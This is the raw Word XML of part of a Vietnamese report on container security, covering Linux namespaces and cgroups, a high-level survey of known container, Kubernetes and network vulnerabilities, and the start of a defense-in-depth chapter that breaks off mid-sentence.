    <w:p w14:paraId="35C06EEA" w14:textId="14123A62" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Linux Namespaces là tính năng nhân hệ điều hành giúp cô lập tài nguyên, cho phép nhiều container chạy đồng thời trên cùng một máy chủ mà không xung đột</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-228541932"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="006A3013">
            <w:instrText xml:space="preserve"> CITATION Ros \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="006A3013">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [2]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. Các loại phổ biến bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8CA29" w14:textId="75DFB800" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>PID: Cô lập tiến trình (cho phép container có tiến trình PID 1 riêng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D8918" w14:textId="7508DDC3" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Net: Cô lập mạng (giao diện, bảng định tuyến, cổng kết nối độc lập).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22672A03" w14:textId="3E34A093" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Mnt: Cô lập hệ thống tệp (giới hạn quyền truy cập vào cấu trúc thư mục).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEC143" w14:textId="3D570EFC" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>IPC: Cô lập giao tiếp giữa các tiến trình (ngăn chia sẻ bộ nhớ trái phép).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26243E2C" w14:textId="4F3C9BAD" w:rsidR="006A3013" w:rsidRPr="006A3013" w:rsidRDefault="006A3013" w:rsidP="006A3013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>User: Ánh xạ người dùng (cho phép quyền root trong container nhưng chỉ là người dùng thường trên máy chủ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F7375" w14:textId="7A8A4920" w:rsidR="00F51078" w:rsidRDefault="00F51078" w:rsidP="006A3013">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F51078">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299D6402" wp14:editId="719FECC2">
            <wp:extent cx="5034559" cy="548704"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="120266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65682" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5137959" cy="559973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD87BAD" w14:textId="43091B6A" w:rsidR="00F51078" w:rsidRDefault="00F51078" w:rsidP="00F51078">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc233498140"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</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9</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F51078">
        <w:t>.  Không gian tên net trên thực tế khi chạy Docker con</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tainer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BA3DD31" w14:textId="5641B695" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:bookmarkStart w:id="18" w:name="_Toc233498089"/>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve"> tạo các góc nhìn biệt lập về tài nguyên hệ thống (GKR) bằng cách giới hạn phạm vi truy cập của tiến trình dựa trên các cờ (flags). Chúng được quản lý qua các </w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>system calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve"> như clone() và unshare(), tự động tồn tại khi có tiến trình thành viên và bị nhân Linux hủy bỏ khi tiến trình cuối cùng kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D58FB" w14:textId="75A9BC25" w:rsidR="009D772B" w:rsidRPr="00482F63" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00482F63">
        <w:t>Control Groups (cgroups)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1523CF31" w14:textId="703D3BB5" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:bookmarkStart w:id="19" w:name="_Toc233498090"/>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>cgroups (Control Groups)</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve"> là giải pháp nhân Linux (tích hợp từ 2008) giúp quản lý và giới hạn tài nguyên phần cứng cho các tiến trình. Trong khi Namespaces thực hiện cô lập, cgroups kiểm soát chặt chẽ hạn ngạch (quotas) về </w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU, RAM, băng thông mạng và I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t>, đảm bảo tính ổn định cho máy chủ host bằng cách ngăn chặn một container tiêu thụ quá mức tài nguyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432EA069" w14:textId="2ACCFD72" w:rsidR="00026BE1" w:rsidRPr="009E0111" w:rsidRDefault="00FC61AA" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kết luận chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="45FE760F" w14:textId="77777777" w:rsidR="00EE0942" w:rsidRPr="00FA4830" w:rsidRDefault="00817518" w:rsidP="00EE0942">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D12D0">
        <w:t xml:space="preserve">Container tận dụng Namespaces (cô lập tài nguyên logic) và cgroups (giới hạn tài nguyên phần cứng) từ nhân Linux để tạo môi trường thực thi độc lập thay vì mô </w:t>
      </w:r>
      <w:r w:rsidRPr="003D12D0">
        <w:lastRenderedPageBreak/>
        <w:t>phỏng phần cứng như máy ảo (VM). Nhờ chia sẻ nhân hệ điều hành chủ, container tối ưu hiệu năng và khởi động nhanh, là giải pháp lý tưởng cho kiến trúc vi dịch vụ (Microservices). Tuy nhiên, kiến trúc này có bề mặt tấn công rộng hơn do chia sẻ nhân hệ điều hành, đòi hỏi các cấu hình bảo mật nghiêm ngặt để ngăn chặn rủi ro thoát chuồng hoặc khai thác lỗ hổng nhân</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc233498091"/>
    </w:p>
    <w:p w14:paraId="27FB886B" w14:textId="5C4EE772" w:rsidR="009D772B" w:rsidRPr="00727AA1" w:rsidRDefault="00026BE1" w:rsidP="00EE0942">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00727AA1">
        <w:t>CÁC LỖ HỔNG VÀ THÁCH THỨC BẢO MẬT MỚI ĐỐI VỚI HỆ THỐNG CONTAINER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6FD7801C" w14:textId="2CCAD06B" w:rsidR="00026BE1" w:rsidRPr="000A54C5" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc233498092"/>
      <w:r w:rsidRPr="000A54C5">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="28546648" w14:textId="77777777" w:rsidR="00491C76" w:rsidRPr="00491C76" w:rsidRDefault="00491C76" w:rsidP="00491C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc233498093"/>
      <w:r w:rsidRPr="00491C76">
        <w:t>Chương 2 phân tích các lỗ hổng bảo mật và kẽ hở kiến trúc trong hệ sinh thái container phân lớp, vốn làm mở rộng bề mặt tấn công của hệ thống. Nội dung tập trung vào bốn phân lớp chính: lỗ hổng trong tệp tin ảnh, rủi ro thoát cô lập tại trình thực thi, lỗi phân quyền trong Kubernetes và các thách thức an ninh mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C583FF" w14:textId="4F8E7CBE" w:rsidR="00026BE1" w:rsidRPr="00491C76" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00491C76">
        <w:t>Lỗ hổng bảo mật trong Container Image và chuỗi cung ứng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="60485D23" w14:textId="77777777" w:rsidR="00491C76" w:rsidRPr="00FA4830" w:rsidRDefault="00491C76" w:rsidP="00491C76">
      <w:r w:rsidRPr="00491C76">
        <w:t>Kiến trúc container hóa ngày càng phụ thuộc vào mã nguồn mở, tạo cơ hội cho kẻ tấn công chuyển trọng tâm từ các lỗ hổng vận hành sang thao túng tính toàn vẹn của phần mềm ngay từ giai đoạn phát triển và đóng gói chuỗi cung ứng. Đây là bề mặt tấn công phổ biến, tập trung vào các rủi ro trong quá trình xây dựng và phân phối tệp tin ảnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557417E5" w14:textId="0E5B513E" w:rsidR="00FC61AA" w:rsidRDefault="00197171" w:rsidP="00FC61AA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00197171">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B42BA13" wp14:editId="4730AF55">
            <wp:extent cx="5145019" cy="2349500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1529424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49472" cy="2351534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40243538" w14:textId="34DFC688" w:rsidR="00CA45BC" w:rsidRPr="00FC61AA" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc233498141"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FC61AA">
        <w:t>. Luồng tấn công vào cont</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chuỗi</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ứng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4957E467" w14:textId="021DCFF4" w:rsidR="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc233498097"/>
      <w:r w:rsidRPr="00197171">
        <w:lastRenderedPageBreak/>
        <w:t>Lỗ hổng bảo mật trong lớp Container Runtime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="68C28E1F" w14:textId="6ECD1BAB" w:rsidR="00491C76" w:rsidRPr="00491C76" w:rsidRDefault="00491C76" w:rsidP="00491C76">
      <w:bookmarkStart w:id="25" w:name="_Toc233498098"/>
      <w:r w:rsidRPr="00491C76">
        <w:t>Lớp thực thi container là mục tiêu khai thác nguy hiểm với các lỗ hổng thiết kế như CVE-2019-5736 trong runc hay CVE-2020-15257 trong containerd, cho phép kẻ tấn công thoát chuồng và chiếm quyền root trên máy chủ. Ngoài ra, các lỗ hổng nhân Linux như "Dirty Pipe" (CVE-2022-0847) còn cho phép tin tặc vượt qua ranh giới cô lập bằng cách ghi đè tệp tin hệ thống nhạy cảm của máy chủ. Các sự kiện này khẳng định rằng dù được thiết kế kiên cố, mọi kẽ hở kiến trúc hoặc sai sót cấu hình tại lớp Runtime đều có thể dẫn đến sự sụp đổ hoàn toàn các rào cản bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C4E8E" w14:textId="4B53CBE9" w:rsidR="00026BE1" w:rsidRPr="00FA4830" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA4830">
        <w:t>Lỗ hổng bảo mật trong Hệ điều phối</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="4369CCFF" w14:textId="1D343939" w:rsidR="00817518" w:rsidRPr="00FA4830" w:rsidRDefault="00491C76" w:rsidP="00817518">
      <w:bookmarkStart w:id="26" w:name="_Toc233498099"/>
      <w:r>
        <w:t>Các lỗ hổng trên tầng điều phối như CVE-2018-1002105 cho phép tin tặc thao túng toàn cụm, thực thi lệnh tùy ý với đặc quyền tối cao mà không cần xác thực. Chiến dịch Hildegard của TeamTNT minh chứng việc khai thác cổng Kubelet cấu hình sai để khởi tạo Pod độc hại, từ đó di chuyển ngang và chiếm quyền kiểm soát toàn bộ cụm. Các sai sót trong thiết lập tường lửa API Server và lạm dụng phân quyền RBAC (như CVE-2021-25741) cho phép tin tặc vô hiệu hóa các lớp phòng thủ nội bộ và chiếm quyền kiểm soát hạ tầng trong tích tắc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C70DB" w14:textId="21275E80" w:rsidR="00026BE1" w:rsidRPr="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>liên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đến</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiến</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trúc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Container Networking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="32936895" w14:textId="34BBD87D" w:rsidR="00B3514A" w:rsidRPr="00B3514A" w:rsidRDefault="00B3514A" w:rsidP="00B3514A">
      <w:r w:rsidRPr="00B3514A">
        <w:t>Kiến trúc mạng phẳng thiếu mã hóa tạo điều kiện cho các cuộc tấn công di chuyển ngang và MitM. Các lỗ hổng định tuyến như CVE-2020-8554 và chiến dịch Siloscape chứng minh tin tặc dễ dàng lợi dụng cấu hình mạng lỏng lẻo để chiếm quyền kiểm soát hạ tầng. Do đó, bảo vệ bằng tường lửa vùng biên là không đủ; bắt buộc phải triển khai cô lập mạng vi phân (Micro-segmentation) và mã hóa dữ liệu (mTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE10F0E" w14:textId="3AA3A23A" w:rsidR="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</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chương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="480FBAF1" w14:textId="5008565C" w:rsidR="00B3514A" w:rsidRPr="00B3514A" w:rsidRDefault="00B3514A" w:rsidP="00B3514A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc233498100"/>
      <w:r w:rsidRPr="00B3514A">
        <w:t xml:space="preserve">Chương 2 đã phân tích các lỗ hổng bảo mật nghiêm trọng trong kiến trúc Container, bao gồm các điểm yếu trong hệ điều phối (như CVE-2018-1002105, CVE-2021-25741) và những rủi ro từ kiến trúc mạng phẳng thiếu mã hóa. Nghiên cứu chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3514A">
        <w:lastRenderedPageBreak/>
        <w:t>ra rằng tin tặc có thể khai thác các cấu hình sai sót và lỗ hổng hạ tầng để thực hiện các cuộc tấn công di chuyển ngang, chiếm quyền kiểm soát cụm hoặc thực thi mã độc, qua đó làm tiền đề thực tiễn cho việc xây dựng các lớp phòng thủ chuyên sâu ở các phần tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2C4A8" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc233498119"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00671F8E">
        <w:t>XÂY DỰNG GIẢI PHÁP BẢO VỆ CHO HỆ THỐNG CONTAINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50CE26" w14:textId="64FA37A5" w:rsidR="009C66BE" w:rsidRPr="00F133D8" w:rsidRDefault="009C66BE" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4D6E8919" w14:textId="77777777" w:rsidR="00212603" w:rsidRPr="009823E1" w:rsidRDefault="00212603" w:rsidP="00212603">
      <w:r w:rsidRPr="00212603">
        <w:t>Dựa trên kết quả phân tích các véc-tơ tấn công thực chứng tại Chương 3 (bao gồm Container Escape, đánh cắp Token đặc quyền và nghe lén mạng phẳng), chương này đề xuất một hệ thống phòng thủ đa lớp (Defense-in-Depth) theo mô hình Zero-Trust. Điểm nhấn khoa học của chương là việc áp dụng phương pháp luận MITRE ATT&amp;CK để thiết kế kiến trúc, kết hợp với công nghệ eBPF tiên tiến để giải quyết triệt để bài toán: Bảo đảm an ninh tuyệt đối ở mức nhân hệ điều hành (Kernel-level) nhưng không làm suy giảm hiệu năng vi dịch vụ (Microservices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC9E95" w14:textId="53E841C5" w:rsidR="00212603" w:rsidRPr="00F133D8" w:rsidRDefault="00212603" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc233498120"/>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Phương pháp luận và Cơ sở lý thuyết nền tảng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="69839635" w14:textId="4290345E" w:rsidR="00212603" w:rsidRPr="009823E1" w:rsidRDefault="00212603" w:rsidP="00212603">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Việc thiết kế giải pháp không dựa trên cảm tính hay chắp vá công cụ, mà được định hướng bởi các khung tham chiếu an ninh tiêu</w:t>
      </w:r>
      <w:r w:rsidR="008A233C" w:rsidRPr="009823E1">
        <w:rPr>
